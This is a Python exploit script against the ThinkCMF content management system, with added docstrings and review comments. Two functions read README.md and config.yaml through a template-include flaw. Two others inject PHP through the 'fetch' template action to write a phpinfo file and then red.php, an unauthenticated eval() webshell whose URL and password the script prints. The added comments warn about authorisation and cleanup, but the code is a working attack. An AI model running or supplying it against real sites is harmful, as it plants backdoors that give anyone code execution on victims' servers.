import argparse

import requests
from requests.exceptions import RequestException
# Browser-like User-Agent (Chrome 80 on Linux) sent with every probe so the
# requests do not advertise themselves as a scripted client.
_USER_AGENT = ('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 '
               '(KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36')
headers = {'User-Agent': _USER_AGENT}
def payload_01(url):
    """Probe the ThinkCMF template-include read by fetching README.md.

    Requests ``?a=display&templateFile=README.md`` on the target and looks
    for the ``## README`` marker in the body. Read-only: nothing is written
    to the target.

    Args:
        url: Base URL of the target. It is concatenated as-is, so a value
            that already carries a query string yields a malformed request.

    Returns:
        0 if the marker was found (the finding is printed), 1 if the
        request completed without the marker, 2 on any RequestException
        (timeout, connection failure, ...).
    """
    probe = url + '?a=display&templateFile=README.md'
    try:
        body = requests.get(probe, headers=headers, timeout=5).text
    except RequestException:
        return 2
    if '## README' not in body:
        return 1
    print('[+]存在readme.md: {}?a=display&templateFile=README.md'.format(url))
    return 0
def payload_02(url):
    """Probe the ThinkCMF template-include read by fetching config.yaml.

    Requests ``?a=display&templateFile=config.yaml`` and looks for the
    ``name: thinkcmf`` marker. Only the marker is checked; the body is not
    printed or stored. NOTE(review): a successfully included config file
    presumably contains more than the marker (e.g. application settings or
    credentials) -- treat a hit as sensitive, confirm against the target.

    Args:
        url: Base URL of the target, concatenated as-is (no query string).

    Returns:
        0 if the marker was found (finding printed), 1 if the request
        completed without it, 2 on any RequestException.
    """
    probe = url + '?a=display&templateFile=config.yaml'
    try:
        body = requests.get(probe, headers=headers, timeout=5).text
    except RequestException:
        return 2
    if 'name: thinkcmf' not in body:
        return 1
    print('[+]存在config.yaml: {}?a=display&templateFile=config.yaml'.format(url))
    return 0
def payload_03(url):
    """Write a phpinfo() file through the ThinkCMF ``fetch`` template injection.

    This is an active exploitation step, not a read-only probe: the first
    request asks the target to ``file_put_contents('test.php', ...)`` in its
    web root, the second fetches ``/test.php`` and looks for the
    ``http://www.php.net`` string that a phpinfo() page contains.

    Nothing in this script removes ``test.php`` afterwards. The write may
    also have succeeded even when the verification below fails (a non-200
    status, or a phpinfo page without that exact marker), so check and clean
    up the target after use. NOTE(review): newer PHP builds may link to
    https://www.php.net instead -- confirm the marker before trusting a 1.

    Args:
        url: Base URL of the target, concatenated as-is.

    Returns:
        0 if the phpinfo page was confirmed (finding printed), 1 if either
        request completed without confirming it, 2 on any RequestException.
    """
    inject = (
        url
        + "?a=fetch&templateFile=public/index&prefix=''&content="
        + "<php>file_put_contents('test.php','<?php phpinfo();?>')</php>"
    )
    try:
        if requests.get(inject, headers=headers, timeout=5).status_code != 200:
            return 1
        check = requests.get(url + '/test.php', headers=headers, timeout=5)
    except RequestException:
        return 2
    if check.status_code != 200 or 'http://www.php.net' not in check.text:
        return 1
    print('[+]phpinfo: {}/test.php'.format(url))
    return 0
def payload_04(url):
    """Drop a webshell through the ThinkCMF ``fetch`` template injection.

    The first request asks the target to write ``red.php`` containing
    ``by:zjun <?php eval($_POST["red"]);?>`` into its web root; the second
    fetches ``/red.php`` and looks for the ``by:zjun`` marker. Redirects are
    not followed on either request.

    Security note: ``red.php`` is an unauthenticated ``eval`` of POST data --
    anyone who discovers it has code execution on the host, not only the
    tester. This script never removes it. Only run this against systems you
    are authorized to test, and delete the file when the engagement ends;
    the write may have succeeded even if the verification below fails.

    Args:
        url: Base URL of the target, concatenated as-is.

    Returns:
        0 if the shell was confirmed (finding printed, shell password "red"),
        1 if the requests completed without confirming it, 2 on any
        RequestException.
    """
    inject = (
        url
        + "?a=fetch&templateFile=public/index&prefix=''&content="
        + '''<php>file_put_contents('red.php','by:zjun <?php eval($_POST["red"]);?>')</php>'''
    )
    try:
        dropped = requests.get(inject, headers=headers, allow_redirects=False, timeout=5)
        if dropped.status_code != 200:
            return 1
        shell = requests.get(url + '/red.php', headers=headers, allow_redirects=False, timeout=5)
    except RequestException:
        return 2
    if 'by:zjun' not in shell.text:
        return 1
    print('[+]请连接shell,密码是red: {}/red.php'.format(url))
    return 0
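if __name__ == '__main__':
    # figlet-style "thinkcmf-exp" banner (column alignment is cosmetic)
    print(r'''
 _   _     _       _                     __
| |_| |__ (_)_ __ | | _____ _ __ ___    / _|   _____  ___ __
| __| '_ \| | '_ \| |/ / __| '_ ` _ \  | |_ _____ / _ \ \/ / '_ \
| |_| | | | | | | |   < (__| | | | | | |  _|_____|  __/>  <| |_) |
 \__|_| |_|_|_| |_|_|\_\___|_| |_| |_|_|       \___/_/\_\ .__/
                                                         |_|
                                    -by:zjun www.zjun.info
    该脚本具有一定误差,请谨慎使用,仅供参考!
''')
    parser = argparse.ArgumentParser(description='The exp of thinkcmf')
    parser.add_argument('-u', '--url', required=True, help='target url')
    args = parser.parse_args()
    url = args.url

    # Each probe returns 0 = finding printed, 1 = request completed without
    # a finding, 2 = RequestException. Results are kept in a list instead of
    # rebinding the function names, and payload_03/payload_04 actively write
    # test.php / red.php to the target (see their docstrings).
    results = [payload_01(url), payload_02(url), payload_03(url), payload_04(url)]

    if 0 in results:
        print('^ _ ^ enjoy it!')
        # red.php is an unauthenticated eval() webshell and nothing here
        # removes it; remind the operator before the session is closed.
        print('[!] test.php / red.php may now exist in the target web root; '
              'remove them when testing is complete')
    elif all(code == 2 for code in results):
        # Original condition was `p1 and p2 and p3 and p4 == 2`, which only
        # compared the last probe and reported "timeout" even when the first
        # three requests completed; require every probe to have failed.
        print('[-]连接超时:{}'.format(url))
    else:
        print('[-]初步测试暂不存在thinkcmf漏洞: {}'.format(url))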